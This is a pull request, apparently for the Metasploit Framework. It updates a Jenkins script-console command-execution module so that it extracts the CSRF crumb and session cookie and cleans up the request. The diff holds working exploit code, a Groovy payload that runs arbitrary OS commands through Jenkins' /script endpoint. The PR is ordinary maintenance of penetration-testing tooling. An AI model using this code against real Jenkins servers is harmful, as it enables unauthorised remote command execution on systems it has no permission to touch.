### PR TITLE
Support CSRF token in the Jenkins aux cmd module

### DIFF
--- a/modules/auxiliary/scanner/http/jenkins_command.rb
+++ b/modules/auxiliary/scanner/http/jenkins_command.rb
@@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true,  'The path to the Jenkins-CI application', '/jenkins/' ]),
-        OptString.new('COMMAND', [true, 'Command to run in application', 'whoami']),
+        OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]),
+        OptString.new('COMMAND', [ true, 'Command to run in application', 'whoami' ]),
       ], self.class)
   end
 
@@ -45,6 +45,7 @@ class Metasploit3 < Msf::Auxiliary
     # Verify that we received a proper systemInfo response
     unless res && res.body.to_s.length > 0
       vprint_error("#{peer} - The server did not reply to our systemInfo request")
+      return
     end
 
     unless res.body.index("System Properties") &&
@@ -57,22 +58,40 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
+    host_info = {}
+    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
+      print_status("#{peer} Using CSRF token: '#{$1}'")
+      host_info[:crumb] = $1
+
+      sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
+      host_info[:cookie] = "#{sessionid}"
+    end
+
     os_info = pattern_extract(/os.name(.*?)os.version/m, res.body).first
-    os_info.index(">Windows") ? "cmd.exe /c " : ""
+    host_info[:prefix] = os_info.index(">Windows") ? "cmd.exe /c " : ""
+    host_info
   end
 
   def run_host(ip)
     command = datastore['COMMAND'].gsub("\\", "\\\\\\")
 
-    prefix = fingerprint_os(ip)
-    return if prefix.nil?
+    host_info = fingerprint_os(ip)
+    return if host_info.nil?
+    prefix = host_info[:prefix]
 
-    res = send_request_cgi({
+    request_parameters = {
       'uri'       => "#{target_uri.path}script",
       'method'    => 'POST',
       'ctype'     => 'application/x-www-form-urlencoded',
-      'data'      => "script=def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%0D%0Adef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%22%0D%0A&json=%7B%22script%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%5Cnproc.waitForOrKill%281000%29%5Cnprintln+%5C%22out%26gt%3B+%24sout+err%26gt%3B+%24serr%5C%22%5Cn%22%2C+%22%22%3A+%22def+sout+%3D+new+StringBuffer%28%29%2C+serr+%3D+new+StringBuffer%28%29%5Cndef+proc+%3D+%27#{prefix}+#{command}%27.execute%28%29%5Cnproc.consumeProcessOutput%28sout%2C+serr%29%22%7D&Submit=Run"
-    })
+      'vars_post' =>
+        {
+          'script' => "def sout = new StringBuffer(), serr = new StringBuffer()\r\ndef proc = '#{prefix} #{command}'.execute()\r\nproc.consumeProcessOutput(sout, serr)\r\nproc.waitForOrKill(1000)\r\nprintln \"out> $sout err> $serr\"\r\n",
+          'Submit' => 'Run'
+        }
+    }
+    request_parameters['cookie'] = host_info[:cookie] unless host_info[:cookie].nil?
+    request_parameters['vars_post']['.crumb'] = host_info[:crumb] unless host_info[:crumb].nil?
+    res = send_request_cgi(request_parameters)
 
     unless res && res.body.to_s.length > 0
       vprint_error("#{peer} No response received from the server.")

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -172,8 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
-        print_status("Using CSRF token: '#{$1}'");
-        @crumb = $1;
+      print_status("Using CSRF token: '#{$1}'")
+      @crumb = $1
     end
 
     case target['Platform']


### PR DESCRIPTION
This module cleans up the main HTTP request so it's a bit more readable and more importantly adds support for retrieving the CSRF token and cookie which are necessary if CSRF protection is enabled in Jenkins. No additional HTTP requests are made so it shouldn't slow the module down. Also based on the exploit module, it doesn't look like the JSON parameter of the request is necessary as the contents are redundant.

Testing:
- [ ] Enable CSRF protection in the "Configure Global Security" section
- [ ] The module should still run the command as expected
